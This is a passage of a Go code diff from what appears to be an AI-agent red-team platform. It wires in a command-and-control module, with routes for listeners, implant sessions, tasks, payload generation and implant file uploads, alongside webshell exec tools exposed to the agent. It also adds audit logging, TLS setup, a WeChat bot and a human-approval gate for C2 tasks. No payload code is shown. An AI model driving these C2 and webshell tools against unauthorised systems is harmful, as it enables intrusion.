ID: o.EinoName, ID: o.EinoName,
Name: o.DisplayName, Name: o.DisplayName,
Description: o.Description, Description: o.Description,
Instruction: o.Instruction, Instruction: o.Instruction,
Kind: "orchestrator", Kind: "orchestrator",
} }
} }
+222 -13
View File
@@ -3,8 +3,10 @@ package app
import ( import (
"context" "context"
"crypto/subtle" "crypto/subtle"
"crypto/tls"
"database/sql" "database/sql"
"fmt" "fmt"
"net"
"net/http" "net/http"
"os" "os"
"path/filepath" "path/filepath"
@@ -13,8 +15,11 @@ import (
"time" "time"
"cyberstrike-ai/internal/agent" "cyberstrike-ai/internal/agent"
"cyberstrike-ai/internal/audit"
"cyberstrike-ai/internal/c2"
"cyberstrike-ai/internal/config" "cyberstrike-ai/internal/config"
"cyberstrike-ai/internal/database" "cyberstrike-ai/internal/database"
"cyberstrike-ai/internal/einoobserve"
"cyberstrike-ai/internal/handler" "cyberstrike-ai/internal/handler"
"cyberstrike-ai/internal/knowledge" "cyberstrike-ai/internal/knowledge"
"cyberstrike-ai/internal/logger" "cyberstrike-ai/internal/logger"
@@ -28,6 +33,7 @@ import (
"github.com/gin-gonic/gin" "github.com/gin-gonic/gin"
"github.com/google/uuid" "github.com/google/uuid"
"go.uber.org/zap" "go.uber.org/zap"
"golang.org/x/net/http2"
) )
// App 应用 // App 应用
@@ -51,10 +57,16 @@ type App struct {
robotMu sync.Mutex // 保护钉钉/飞书长连接的 cancel robotMu sync.Mutex // 保护钉钉/飞书长连接的 cancel
dingCancel context.CancelFunc // 钉钉 Stream 取消函数,用于配置变更时重启 dingCancel context.CancelFunc // 钉钉 Stream 取消函数,用于配置变更时重启
larkCancel context.CancelFunc // 飞书长连接取消函数,用于配置变更时重启 larkCancel context.CancelFunc // 飞书长连接取消函数,用于配置变更时重启
wechatCancel context.CancelFunc // 微信 iLink 长轮询取消函数
c2Manager *c2.Manager // C2 管理器(未启用 C2 时为 nil)
c2Watchdog *c2.SessionWatchdog // C2 会话看门狗
c2WatchdogCancel context.CancelFunc // 看门狗取消函数
c2Handler *handler.C2Handler // C2 REST(与 Manager 生命周期同步)
auditSvc *audit.Service
} }
// New 创建新应用 // New 创建新应用
func New(cfg *config.Config, log *logger.Logger) (*App, error) { func New(cfg *config.Config, log *logger.Logger, configPath string) (*App, error) {
gin.SetMode(gin.ReleaseMode) gin.SetMode(gin.ReleaseMode)
router := gin.Default() router := gin.Default()
@@ -83,8 +95,14 @@ func New(cfg *config.Config, log *logger.Logger) (*App, error) {
return nil, fmt.Errorf("初始化数据库失败: %w", err) return nil, fmt.Errorf("初始化数据库失败: %w", err)
} }
auditSvc := audit.NewService(db, cfg, log.Logger)
audit.RegisterConversationCreateHook(auditSvc)
auditSvc.PurgeExpired()
audit.StartRetentionLoop(auditSvc, log.Logger)
// 创建MCP服务器(带数据库持久化) // 创建MCP服务器(带数据库持久化)
mcpServer := mcp.NewServerWithStorage(log.Logger, db) mcpServer := mcp.NewServerWithStorage(log.Logger, db)
mcpServer.ConfigureHTTPToolCallTimeoutFromAgentMinutes(cfg.Agent.ToolTimeoutMinutes)
// 创建安全工具执行器 // 创建安全工具执行器
executor := security.NewExecutor(&cfg.Security, mcpServer, log.Logger) executor := security.NewExecutor(&cfg.Security, mcpServer, log.Logger)
@@ -133,6 +151,7 @@ func New(cfg *config.Config, log *logger.Logger) (*App, error) {
maxIterations = 30 // 默认值 maxIterations = 30 // 默认值
} }
agent := agent.NewAgent(&cfg.OpenAI, &cfg.Agent, mcpServer, externalMCPMgr, log.Logger, maxIterations) agent := agent.NewAgent(&cfg.OpenAI, &cfg.Agent, mcpServer, externalMCPMgr, log.Logger, maxIterations)
agent.UpdateToolDescriptionMode(cfg.Security.ToolDescriptionMode)
// 设置结果存储到Agent // 设置结果存储到Agent
agent.SetResultStorage(resultStorage) agent.SetResultStorage(resultStorage)
@@ -210,6 +229,7 @@ func New(cfg *config.Config, log *logger.Logger) (*App, error) {
// 创建知识库API处理器 // 创建知识库API处理器
knowledgeHandler = handler.NewKnowledgeHandler(knowledgeManager, knowledgeRetriever, knowledgeIndexer, db, log.Logger) knowledgeHandler = handler.NewKnowledgeHandler(knowledgeManager, knowledgeRetriever, knowledgeIndexer, db, log.Logger)
knowledgeHandler.SetAudit(auditSvc)
log.Logger.Info("知识库模块初始化完成", zap.Bool("handler_created", knowledgeHandler != nil)) log.Logger.Info("知识库模块初始化完成", zap.Bool("handler_created", knowledgeHandler != nil))
// 扫描知识库并建立索引(异步) // 扫描知识库并建立索引(异步)
@@ -284,10 +304,10 @@ func New(cfg *config.Config, log *logger.Logger) (*App, error) {
}() }()
} }
// 获取配置文件路径 // 配置文件路径必须由入口传入(与 flag -config 一致)。勿再用 os.Args[1],否则 ./cyberstrike-ai --https 会把 --https 当成路径。
configPath := "config.yaml" configPath = strings.TrimSpace(configPath)
if len(os.Args) > 1 { if configPath == "" {
configPath = os.Args[1] configPath = "config.yaml"
} }
skillsDir := skillpackage.SkillsRootFromConfig(cfg.SkillsDir, configPath) skillsDir := skillpackage.SkillsRootFromConfig(cfg.SkillsDir, configPath)
@@ -306,38 +326,62 @@ func New(cfg *config.Config, log *logger.Logger) (*App, error) {
log.Logger.Warn("创建 agents 目录失败", zap.String("path", agentsDir), zap.Error(err)) log.Logger.Warn("创建 agents 目录失败", zap.String("path", agentsDir), zap.Error(err))
} }
markdownAgentsHandler := handler.NewMarkdownAgentsHandler(agentsDir) markdownAgentsHandler := handler.NewMarkdownAgentsHandler(agentsDir)
markdownAgentsHandler.SetAudit(auditSvc)
log.Logger.Info("多代理 Markdown 子 Agent 目录", zap.String("agentsDir", agentsDir)) log.Logger.Info("多代理 Markdown 子 Agent 目录", zap.String("agentsDir", agentsDir))
// 创建处理器 // 创建处理器
agentHandler := handler.NewAgentHandler(agent, db, cfg, log.Logger) agentHandler := handler.NewAgentHandler(agent, db, cfg, log.Logger)
agentHandler.SetAudit(auditSvc)
agentHandler.SetAgentsMarkdownDir(agentsDir) agentHandler.SetAgentsMarkdownDir(agentsDir)
// 如果知识库已启用,设置知识库管理器到AgentHandler以便记录检索日志 // 如果知识库已启用,设置知识库管理器到AgentHandler以便记录检索日志
if knowledgeManager != nil { if knowledgeManager != nil {
agentHandler.SetKnowledgeManager(knowledgeManager) agentHandler.SetKnowledgeManager(knowledgeManager)
} }
monitorHandler := handler.NewMonitorHandler(mcpServer, executor, db, log.Logger) monitorHandler := handler.NewMonitorHandler(mcpServer, executor, db, log.Logger)
monitorHandler.SetAudit(auditSvc)
monitorHandler.SetExternalMCPManager(externalMCPMgr) // 设置外部MCP管理器,以便获取外部MCP执行记录 monitorHandler.SetExternalMCPManager(externalMCPMgr) // 设置外部MCP管理器,以便获取外部MCP执行记录
notificationHandler := handler.NewNotificationHandler(db, agentHandler, log.Logger)
groupHandler := handler.NewGroupHandler(db, log.Logger) groupHandler := handler.NewGroupHandler(db, log.Logger)
authHandler := handler.NewAuthHandler(authManager, cfg, configPath, log.Logger) authHandler := handler.NewAuthHandler(authManager, cfg, configPath, log.Logger)
authHandler.SetAudit(auditSvc)
attackChainHandler := handler.NewAttackChainHandler(db, &cfg.OpenAI, log.Logger) attackChainHandler := handler.NewAttackChainHandler(db, &cfg.OpenAI, log.Logger)
vulnerabilityHandler := handler.NewVulnerabilityHandler(db, log.Logger) vulnerabilityHandler := handler.NewVulnerabilityHandler(db, log.Logger)
vulnerabilityHandler.SetAudit(auditSvc)
webshellHandler := handler.NewWebShellHandler(log.Logger, db) webshellHandler := handler.NewWebShellHandler(log.Logger, db)
webshellHandler.SetAudit(auditSvc)
chatUploadsHandler := handler.NewChatUploadsHandler(log.Logger) chatUploadsHandler := handler.NewChatUploadsHandler(log.Logger)
chatUploadsHandler.SetAudit(auditSvc)
registerWebshellTools(mcpServer, db, webshellHandler, log.Logger) registerWebshellTools(mcpServer, db, webshellHandler, log.Logger)
registerWebshellManagementTools(mcpServer, db, webshellHandler, log.Logger) registerWebshellManagementTools(mcpServer, db, webshellHandler, log.Logger)
configHandler := handler.NewConfigHandler(configPath, cfg, mcpServer, executor, agent, attackChainHandler, externalMCPMgr, log.Logger) configHandler := handler.NewConfigHandler(configPath, cfg, mcpServer, executor, agent, attackChainHandler, externalMCPMgr, log.Logger)
configHandler.SetAudit(auditSvc)
agentHandler.SetHitlToolWhitelistSaver(configHandler) agentHandler.SetHitlToolWhitelistSaver(configHandler)
externalMCPHandler := handler.NewExternalMCPHandler(externalMCPMgr, cfg, configPath, log.Logger) externalMCPHandler := handler.NewExternalMCPHandler(externalMCPMgr, cfg, configPath, log.Logger)
externalMCPHandler.SetAudit(auditSvc)
roleHandler := handler.NewRoleHandler(cfg, configPath, log.Logger) roleHandler := handler.NewRoleHandler(cfg, configPath, log.Logger)
roleHandler.SetAudit(auditSvc)
skillsHandler := handler.NewSkillsHandler(cfg, configPath, log.Logger) skillsHandler := handler.NewSkillsHandler(cfg, configPath, log.Logger)
skillsHandler.SetAudit(auditSvc)
fofaHandler := handler.NewFofaHandler(cfg, log.Logger) fofaHandler := handler.NewFofaHandler(cfg, log.Logger)
terminalHandler := handler.NewTerminalHandler(log.Logger) terminalHandler := handler.NewTerminalHandler(log.Logger)
if db != nil { if db != nil {
skillsHandler.SetDB(db) // 设置数据库连接以便获取调用统计 skillsHandler.SetDB(db) // 设置数据库连接以便获取调用统计
} }
// ============================================================================
// 初始化 C2 模块(可按配置关闭,节省本机部署资源)
// ============================================================================
c2Manager, c2Watchdog, watchdogCancel := setupC2Runtime(cfg, db, agentHandler, log.Logger)
if c2Manager != nil {
registerC2Tools(mcpServer, c2Manager, log.Logger, cfg.Server.Port)
}
c2Handler := handler.NewC2Handler(c2Manager, log.Logger)
c2Handler.SetAudit(auditSvc)
// 创建OpenAPI处理器 // 创建OpenAPI处理器
conversationHandler := handler.NewConversationHandler(db, log.Logger) conversationHandler := handler.NewConversationHandler(db, log.Logger)
conversationHandler.SetAudit(auditSvc)
auditHandler := handler.NewAuditHandler(db, auditSvc, log.Logger)
robotHandler := handler.NewRobotHandler(cfg, db, agentHandler, log.Logger) robotHandler := handler.NewRobotHandler(cfg, db, agentHandler, log.Logger)
openAPIHandler := handler.NewOpenAPIHandler(db, log.Logger, resultStorage, conversationHandler, agentHandler) openAPIHandler := handler.NewOpenAPIHandler(db, log.Logger, resultStorage, conversationHandler, agentHandler)
@@ -359,6 +403,11 @@ func New(cfg *config.Config, log *logger.Logger) (*App, error) {
knowledgeHandler: knowledgeHandler, knowledgeHandler: knowledgeHandler,
agentHandler: agentHandler, agentHandler: agentHandler,
robotHandler: robotHandler, robotHandler: robotHandler,
c2Manager: c2Manager,
c2Watchdog: c2Watchdog,
c2WatchdogCancel: watchdogCancel,
c2Handler: c2Handler,
auditSvc: auditSvc,
} }
// 飞书/钉钉长连接(无需公网),启用时在后台启动;后续前端应用配置时会通过 RestartRobotConnections 重启 // 飞书/钉钉长连接(无需公网),启用时在后台启动;后续前端应用配置时会通过 RestartRobotConnections 重启
app.startRobotConnections() app.startRobotConnections()
@@ -424,17 +473,29 @@ func New(cfg *config.Config, log *logger.Logger) (*App, error) {
configHandler.SetRetrieverUpdater(knowledgeRetriever) configHandler.SetRetrieverUpdater(knowledgeRetriever)
} }
// 设置机器人连接重启器,前端应用配置后无需重启服务即可使钉钉/飞书新配置生效 // 设置机器人连接重启器,前端应用配置后无需重启服务即可使钉钉/飞书/微信新配置生效
configHandler.SetRobotRestarter(app) configHandler.SetRobotRestarter(app)
wechatRobotHandler := handler.NewWechatRobotHandler(cfg, configHandler, log.Logger)
configHandler.SetC2Runtime(app)
configHandler.SetC2ToolRegistrar(func() error {
if app.config.C2.EnabledEffective() && app.c2Manager != nil {
registerC2Tools(mcpServer, app.c2Manager, log.Logger, app.config.Server.Port)
}
return nil
})
// 设置路由(使用 App 实例以便动态获取 handler // 设置路由(使用 App 实例以便动态获取 handler
setupRoutes( setupRoutes(
router, router,
authHandler, authHandler,
agentHandler, agentHandler,
monitorHandler, monitorHandler,
notificationHandler,
conversationHandler, conversationHandler,
robotHandler, robotHandler,
wechatRobotHandler,
groupHandler, groupHandler,
configHandler, configHandler,
externalMCPHandler, externalMCPHandler,
@@ -448,6 +509,8 @@ func New(cfg *config.Config, log *logger.Logger) (*App, error) {
markdownAgentsHandler, markdownAgentsHandler,
fofaHandler, fofaHandler,
terminalHandler, terminalHandler,
app.c2Handler,
auditHandler,
mcpServer, mcpServer,
authManager, authManager,
openAPIHandler, openAPIHandler,
@@ -498,18 +561,49 @@ func (a *App) RunWithContext(ctx context.Context) error {
}() }()
} }
// 启动主服务器 // 启动主服务器(可选 HTTPS + HTTP/2,见 config server.tls_*
addr := fmt.Sprintf("%s:%d", a.config.Server.Host, a.config.Server.Port) addr := fmt.Sprintf("%s:%d", a.config.Server.Host, a.config.Server.Port)
a.logger.Info("启动HTTP服务器", zap.String("address", addr)) tlsMode, tlsConf, certFile, keyFile, tlsErr := prepareMainServerTLS(&a.config.Server)
if tlsErr != nil {
return tlsErr
}
srv := &http.Server{Addr: addr, Handler: a.router} srv := &http.Server{Addr: addr, Handler: a.router}
var mainMux *mainServerMux
httpRedirect := config.ServerHTTPRedirectEnabled(&a.config.Server)
if tlsMode != mainTLSOff {
srv.TLSConfig = tlsConf
if err := http2.ConfigureServer(srv, &http2.Server{}); err != nil {
return fmt.Errorf("主服务 HTTP/2 配置失败: %w", err)
}
switch tlsMode {
case mainTLSFromFiles:
a.logger.Info("启动 HTTPS 主服务(已启用 HTTP/2 协商)",
zap.String("address", addr),
zap.String("cert", certFile),
)
case mainTLSInMemorySelfSigned:
a.logger.Info("启动 HTTPS 主服务(内存自签证书,仅测试;已启用 HTTP/2 协商)",
zap.String("address", addr),
)
}
if httpRedirect {
a.logger.Info("已启用 HTTP→HTTPS 自动跳转(同端口嗅探分流)", zap.String("address", addr))
}
} else {
a.logger.Info("启动 HTTP 主服务", zap.String("address", addr))
}
// 监听 context 取消,优雅关闭 HTTP 服务器 // 监听 context 取消,优雅关闭 HTTP 服务器
go func() { go func() {
<-ctx.Done() <-ctx.Done()
shutdownCtx, cancel := context.WithTimeout(context.Background(), 10*time.Second) shutdownCtx, cancel := context.WithTimeout(context.Background(), 10*time.Second)
defer cancel() defer cancel()
if err := srv.Shutdown(shutdownCtx); err != nil { if mainMux != nil {
if err := mainMux.Shutdown(shutdownCtx); err != nil {
a.logger.Error("HTTP/HTTPS 分流服务器关闭失败", zap.Error(err))
}
} else if err := srv.Shutdown(shutdownCtx); err != nil {
a.logger.Error("HTTP服务器关闭失败", zap.Error(err)) a.logger.Error("HTTP服务器关闭失败", zap.Error(err))
} }
if mcpServer != nil { if mcpServer != nil {
@@ -519,7 +613,36 @@ func (a *App) RunWithContext(ctx context.Context) error {
} }
}() }()
if err := srv.ListenAndServe(); err != nil && err != http.ErrServerClosed { var err error
switch {
case tlsMode != mainTLSOff && httpRedirect:
var tlsConfReady *tls.Config
tlsConfReady, err = ensureMainTLSConfigCerts(tlsMode, tlsConf, certFile, keyFile)
if err != nil {
return fmt.Errorf("加载 TLS 证书: %w", err)
}
srv.TLSConfig = tlsConfReady
var ln net.Listener
ln, err = net.Listen("tcp", addr)
if err != nil {
return err
}
mainMux = newMainServerMux(ln, srv, portFromListenAddr(addr), a.logger.Logger)
err = mainMux.Serve()
case tlsMode == mainTLSOff:
err = srv.ListenAndServe()
case tlsMode == mainTLSFromFiles:
err = srv.ListenAndServeTLS(certFile, keyFile)
case tlsMode == mainTLSInMemorySelfSigned:
var ln net.Listener
ln, err = tls.Listen("tcp", addr, srv.TLSConfig)
if err == nil {
err = srv.Serve(ln)
}
default:
err = srv.ListenAndServe()
}
if err != nil && err != http.ErrServerClosed {
return err return err
} }
return nil return nil
@@ -527,6 +650,10 @@ func (a *App) RunWithContext(ctx context.Context) error {
// Shutdown 关闭应用 // Shutdown 关闭应用
func (a *App) Shutdown() { func (a *App) Shutdown() {
shutdownCtx, shutdownCancel := context.WithTimeout(context.Background(), 5*time.Second)
_ = einoobserve.ShutdownOtel(shutdownCtx)
shutdownCancel()
// 停止钉钉/飞书长连接 // 停止钉钉/飞书长连接
a.robotMu.Lock() a.robotMu.Lock()
if a.dingCancel != nil { if a.dingCancel != nil {
@@ -539,6 +666,8 @@ func (a *App) Shutdown() {
} }
a.robotMu.Unlock() a.robotMu.Unlock()
a.shutdownC2()
// 停止所有外部MCP客户端 // 停止所有外部MCP客户端
if a.externalMCPMgr != nil { if a.externalMCPMgr != nil {
a.externalMCPMgr.StopAll() a.externalMCPMgr.StopAll()
@@ -567,16 +696,21 @@ func (a *App) startRobotConnections() {
if cfg.Robots.Lark.Enabled && cfg.Robots.Lark.AppID != "" && cfg.Robots.Lark.AppSecret != "" { if cfg.Robots.Lark.Enabled && cfg.Robots.Lark.AppID != "" && cfg.Robots.Lark.AppSecret != "" {
ctx, cancel := context.WithCancel(context.Background()) ctx, cancel := context.WithCancel(context.Background())
a.larkCancel = cancel a.larkCancel = cancel
go robot.StartLark(ctx, cfg.Robots.Lark, a.robotHandler, a.logger.Logger) go robot.StartLark(ctx, cfg.Robots, a.robotHandler, a.logger.Logger)
} }
if cfg.Robots.Dingtalk.Enabled && cfg.Robots.Dingtalk.ClientID != "" && cfg.Robots.Dingtalk.ClientSecret != "" { if cfg.Robots.Dingtalk.Enabled && cfg.Robots.Dingtalk.ClientID != "" && cfg.Robots.Dingtalk.ClientSecret != "" {
ctx, cancel := context.WithCancel(context.Background()) ctx, cancel := context.WithCancel(context.Background())
a.dingCancel = cancel a.dingCancel = cancel
go robot.StartDing(ctx, cfg.Robots.Dingtalk, a.robotHandler, a.logger.Logger) go robot.StartDing(ctx, cfg.Robots, a.robotHandler, a.logger.Logger)
}
if cfg.Robots.Wechat.Enabled && cfg.Robots.Wechat.BotToken != "" {
ctx, cancel := context.WithCancel(context.Background())
a.wechatCancel = cancel
go robot.StartWechat(ctx, cfg.Robots, a.robotHandler, cfg.Version, a.logger.Logger)
} }
} }
// RestartRobotConnections 重启钉钉/飞书长连接,使前端应用配置后立即生效(实现 handler.RobotRestarter // RestartRobotConnections 重启钉钉/飞书/微信长连接,使前端应用配置后立即生效(实现 handler.RobotRestarter
func (a *App) RestartRobotConnections() { func (a *App) RestartRobotConnections() {
a.robotMu.Lock() a.robotMu.Lock()
if a.dingCancel != nil { if a.dingCancel != nil {
@@ -587,6 +721,10 @@ func (a *App) RestartRobotConnections() {
a.larkCancel() a.larkCancel()
a.larkCancel = nil a.larkCancel = nil
} }
if a.wechatCancel != nil {
a.wechatCancel()
a.wechatCancel = nil
}
a.robotMu.Unlock() a.robotMu.Unlock()
// 给旧 goroutine 一点时间退出 // 给旧 goroutine 一点时间退出
time.Sleep(200 * time.Millisecond) time.Sleep(200 * time.Millisecond)
@@ -599,8 +737,10 @@ func setupRoutes(
authHandler *handler.AuthHandler, authHandler *handler.AuthHandler,
agentHandler *handler.AgentHandler, agentHandler *handler.AgentHandler,
monitorHandler *handler.MonitorHandler, monitorHandler *handler.MonitorHandler,
notificationHandler *handler.NotificationHandler,
conversationHandler *handler.ConversationHandler, conversationHandler *handler.ConversationHandler,
robotHandler *handler.RobotHandler, robotHandler *handler.RobotHandler,
wechatRobotHandler *handler.WechatRobotHandler,
groupHandler *handler.GroupHandler, groupHandler *handler.GroupHandler,
configHandler *handler.ConfigHandler, configHandler *handler.ConfigHandler,
externalMCPHandler *handler.ExternalMCPHandler, externalMCPHandler *handler.ExternalMCPHandler,
@@ -614,6 +754,8 @@ func setupRoutes(
markdownAgentsHandler *handler.MarkdownAgentsHandler, markdownAgentsHandler *handler.MarkdownAgentsHandler,
fofaHandler *handler.FofaHandler, fofaHandler *handler.FofaHandler,
terminalHandler *handler.TerminalHandler, terminalHandler *handler.TerminalHandler,
c2Handler *handler.C2Handler,
auditHandler *handler.AuditHandler,
mcpServer *mcp.Server, mcpServer *mcp.Server,
authManager *security.AuthManager, authManager *security.AuthManager,
openAPIHandler *handler.OpenAPIHandler, openAPIHandler *handler.OpenAPIHandler,
@@ -648,6 +790,12 @@ func setupRoutes(
// 机器人测试(需登录):POST /api/robot/testbody: {"platform":"dingtalk","user_id":"test","text":"帮助"},用于验证机器人逻辑 // 机器人测试(需登录):POST /api/robot/testbody: {"platform":"dingtalk","user_id":"test","text":"帮助"},用于验证机器人逻辑
protected.POST("/robot/test", robotHandler.HandleRobotTest) protected.POST("/robot/test", robotHandler.HandleRobotTest)
// 微信 iLink 扫码绑定(需登录)
protected.POST("/robot/wechat/qrcode", wechatRobotHandler.HandleWechatQRCode)
protected.GET("/robot/wechat/qrcode/status", wechatRobotHandler.HandleWechatQRCodeStatus)
protected.POST("/robot/wechat/qrcode/verify", wechatRobotHandler.HandleWechatVerifyCode)
protected.GET("/robot/wechat/status", wechatRobotHandler.HandleWechatStatus)
// Agent Loop // Agent Loop
protected.POST("/agent-loop", agentHandler.AgentLoop) protected.POST("/agent-loop", agentHandler.AgentLoop)
// Agent Loop 流式输出 // Agent Loop 流式输出
@@ -723,10 +871,13 @@ func setupRoutes(
// 监控 // 监控
protected.GET("/monitor", monitorHandler.Monitor) protected.GET("/monitor", monitorHandler.Monitor)
protected.GET("/monitor/execution/:id", monitorHandler.GetExecution) protected.GET("/monitor/execution/:id", monitorHandler.GetExecution)
protected.POST("/monitor/execution/:id/cancel", monitorHandler.CancelExecution)
protected.POST("/monitor/executions/names", monitorHandler.BatchGetToolNames) protected.POST("/monitor/executions/names", monitorHandler.BatchGetToolNames)
protected.DELETE("/monitor/execution/:id", monitorHandler.DeleteExecution) protected.DELETE("/monitor/execution/:id", monitorHandler.DeleteExecution)
protected.DELETE("/monitor/executions", monitorHandler.DeleteExecutions) protected.DELETE("/monitor/executions", monitorHandler.DeleteExecutions)
protected.GET("/monitor/stats", monitorHandler.GetStats) protected.GET("/monitor/stats", monitorHandler.GetStats)
protected.GET("/notifications/summary", notificationHandler.GetSummary)
protected.POST("/notifications/read", notificationHandler.MarkRead)
// 配置管理 // 配置管理
protected.GET("/config", configHandler.GetConfig) protected.GET("/config", configHandler.GetConfig)
@@ -741,6 +892,13 @@ func setupRoutes(
protected.POST("/terminal/run/stream", terminalHandler.RunCommandStream) protected.POST("/terminal/run/stream", terminalHandler.RunCommandStream)
protected.GET("/terminal/ws", terminalHandler.RunCommandWS) protected.GET("/terminal/ws", terminalHandler.RunCommandWS)
// 平台审计日志
protected.GET("/audit/meta", auditHandler.Meta)
protected.GET("/audit/summary", auditHandler.Summary)
protected.GET("/audit/logs", auditHandler.ListLogs)
protected.GET("/audit/logs/export", auditHandler.ExportLogs)
protected.GET("/audit/logs/:id", auditHandler.GetLog)
// 外部MCP管理 // 外部MCP管理
protected.GET("/external-mcp", externalMCPHandler.GetExternalMCPs) protected.GET("/external-mcp", externalMCPHandler.GetExternalMCPs)
protected.GET("/external-mcp/stats", externalMCPHandler.GetExternalMCPStats) protected.GET("/external-mcp/stats", externalMCPHandler.GetExternalMCPStats)
@@ -901,6 +1059,8 @@ func setupRoutes(
// 漏洞管理 // 漏洞管理
protected.GET("/vulnerabilities", vulnerabilityHandler.ListVulnerabilities) protected.GET("/vulnerabilities", vulnerabilityHandler.ListVulnerabilities)
protected.GET("/vulnerabilities/export", vulnerabilityHandler.ExportVulnerabilities)
protected.GET("/vulnerabilities/filter-options", vulnerabilityHandler.GetVulnerabilityFilterOptions)
protected.GET("/vulnerabilities/stats", vulnerabilityHandler.GetVulnerabilityStats) protected.GET("/vulnerabilities/stats", vulnerabilityHandler.GetVulnerabilityStats)
protected.GET("/vulnerabilities/:id", vulnerabilityHandler.GetVulnerability) protected.GET("/vulnerabilities/:id", vulnerabilityHandler.GetVulnerability)
protected.POST("/vulnerabilities", vulnerabilityHandler.CreateVulnerability) protected.POST("/vulnerabilities", vulnerabilityHandler.CreateVulnerability)
@@ -919,6 +1079,52 @@ func setupRoutes(
protected.POST("/webshell/exec", webshellHandler.Exec) protected.POST("/webshell/exec", webshellHandler.Exec)
protected.POST("/webshell/file", webshellHandler.FileOp) protected.POST("/webshell/file", webshellHandler.FileOp)
// C2 管理(未启用时返回 503,避免 Handler 空指针)
c2Routes := protected.Group("/c2")
c2Routes.Use(func(c *gin.Context) {
if app.c2Manager == nil {
c.AbortWithStatusJSON(http.StatusServiceUnavailable, gin.H{
"error": "c2_disabled",
"message": "C2 功能已在系统设置中关闭",
"enabled": false,
})
return
}
c.Next()
})
c2Routes.GET("/listeners", c2Handler.ListListeners)
c2Routes.POST("/listeners", c2Handler.CreateListener)
c2Routes.GET("/listeners/:id", c2Handler.GetListener)
c2Routes.PUT("/listeners/:id", c2Handler.UpdateListener)
c2Routes.DELETE("/listeners/:id", c2Handler.DeleteListener)
c2Routes.POST("/listeners/:id/start", c2Handler.StartListener)
c2Routes.POST("/listeners/:id/stop", c2Handler.StopListener)
c2Routes.GET("/sessions", c2Handler.ListSessions)
c2Routes.GET("/sessions/:id", c2Handler.GetSession)
c2Routes.DELETE("/sessions/:id", c2Handler.DeleteSession)
c2Routes.PUT("/sessions/:id/sleep", c2Handler.SetSessionSleep)
c2Routes.GET("/tasks", c2Handler.ListTasks)
c2Routes.DELETE("/tasks", c2Handler.DeleteTasks)
c2Routes.GET("/tasks/:id", c2Handler.GetTask)
c2Routes.POST("/tasks", c2Handler.CreateTask)
c2Routes.POST("/tasks/:id/cancel", c2Handler.CancelTask)
c2Routes.GET("/tasks/:id/wait", c2Handler.WaitTask)
c2Routes.POST("/sessions/:id/tasks", c2Handler.CreateTask)
c2Routes.POST("/payloads/oneliner", c2Handler.PayloadOneliner)
c2Routes.POST("/payloads/build", c2Handler.PayloadBuild)
c2Routes.GET("/payloads/:id/download", c2Handler.PayloadDownload)
c2Routes.GET("/events", c2Handler.ListEvents)
c2Routes.DELETE("/events", c2Handler.DeleteEvents)
c2Routes.GET("/events/stream", c2Handler.EventStream)
c2Routes.POST("/files/upload", c2Handler.UploadFileForImplant)
c2Routes.GET("/files", c2Handler.ListFiles)
c2Routes.GET("/tasks/:id/result-file", c2Handler.DownloadResultFile)
c2Routes.GET("/profiles", c2Handler.ListProfiles)
c2Routes.GET("/profiles/:id", c2Handler.GetProfile)
c2Routes.POST("/profiles", c2Handler.CreateProfile)
c2Routes.PUT("/profiles/:id", c2Handler.UpdateProfile)
c2Routes.DELETE("/profiles/:id", c2Handler.DeleteProfile)
// 对话附件(chat_uploads)管理 // 对话附件(chat_uploads)管理
protected.GET("/chat-uploads", chatUploadsHandler.List) protected.GET("/chat-uploads", chatUploadsHandler.List)
protected.GET("/chat-uploads/download", chatUploadsHandler.Download) protected.GET("/chat-uploads/download", chatUploadsHandler.Download)
@@ -1754,6 +1960,9 @@ func initializeKnowledge(
// 创建知识库API处理器 // 创建知识库API处理器
knowledgeHandler := handler.NewKnowledgeHandler(knowledgeManager, knowledgeRetriever, knowledgeIndexer, db, logger) knowledgeHandler := handler.NewKnowledgeHandler(knowledgeManager, knowledgeRetriever, knowledgeIndexer, db, logger)
if app != nil && app.auditSvc != nil {
knowledgeHandler.SetAudit(app.auditSvc)
}
logger.Info("知识库模块初始化完成", zap.Bool("handler_created", knowledgeHandler != nil)) logger.Info("知识库模块初始化完成", zap.Bool("handler_created", knowledgeHandler != nil))
// 设置知识库管理器到AgentHandler以便记录检索日志 // 设置知识库管理器到AgentHandler以便记录检索日志
+228
View File
@@ -0,0 +1,228 @@
package app
import (
"context"
"database/sql"
"encoding/json"
"fmt"
"strings"
"time"
"cyberstrike-ai/internal/c2"
"cyberstrike-ai/internal/database"
"github.com/google/uuid"
"go.uber.org/zap"
)
// C2HITLBridge 实现 C2 Manager 的 HITLBridge 接口,将危险任务桥接到现有 HITL 审批流。
// 审批记录写入 hitl_interrupts 表,与现有 HITL 系统共享前端审批 UI。
type C2HITLBridge struct {
db *database.DB
logger *zap.Logger
timeout time.Duration
getConvID func() string
}
// NewC2HITLBridge 创建 C2 HITL 桥
func NewC2HITLBridge(db *database.DB, logger *zap.Logger) *C2HITLBridge {
return &C2HITLBridge{
db: db,
logger: logger,
timeout: 5 * time.Minute,
getConvID: func() string { return "" },
}
}
// SetConversationIDGetter 设置获取当前对话 ID 的函数
func (b *C2HITLBridge) SetConversationIDGetter(fn func() string) {
b.getConvID = fn
}
// SetTimeout 设置审批超时(0 表示不超时)
func (b *C2HITLBridge) SetTimeout(d time.Duration) {
b.timeout = d
}
// RequestApproval 实现 HITLBridge 接口:写入 hitl_interrupts 表并轮询等待审批结果
func (b *C2HITLBridge) RequestApproval(ctx context.Context, req c2.HITLApprovalRequest) error {
interruptID := "hitl_c2_" + strings.ReplaceAll(uuid.New().String(), "-", "")[:14]
now := time.Now()
convID := req.ConversationID
if convID == "" {
convID = b.getConvID()
}
if convID == "" {
convID = "c2_system"
}
payload, _ := json.Marshal(map[string]interface{}{
"task_id": req.TaskID,
"session_id": req.SessionID,
"task_type": req.TaskType,
"payload": req.PayloadJSON,
"source": req.Source,
"reason": req.Reason,
"c2_operation": true,
})
_, err := b.db.Exec(`INSERT INTO hitl_interrupts
(id, conversation_id, message_id, mode, tool_name, tool_call_id, payload, status, created_at)
VALUES (?, ?, ?, ?, ?, ?, ?, 'pending', ?)`,
interruptID, convID, "", "approval",
c2.MCPToolC2Task, req.TaskID,
string(payload), now,
)
if err != nil {
b.logger.Error("C2 HITL: 创建审批记录失败,拒绝执行", zap.Error(err))
return fmt.Errorf("C2 HITL 审批记录创建失败,安全起见拒绝执行: %w", err)
}
b.logger.Info("C2 HITL: 等待人工审批",
zap.String("interrupt_id", interruptID),
zap.String("task_id", req.TaskID),
zap.String("task_type", req.TaskType),
)
// Poll DB waiting for decision
ticker := time.NewTicker(500 * time.Millisecond)
defer ticker.Stop()
var deadline <-chan time.Time
if b.timeout > 0 {
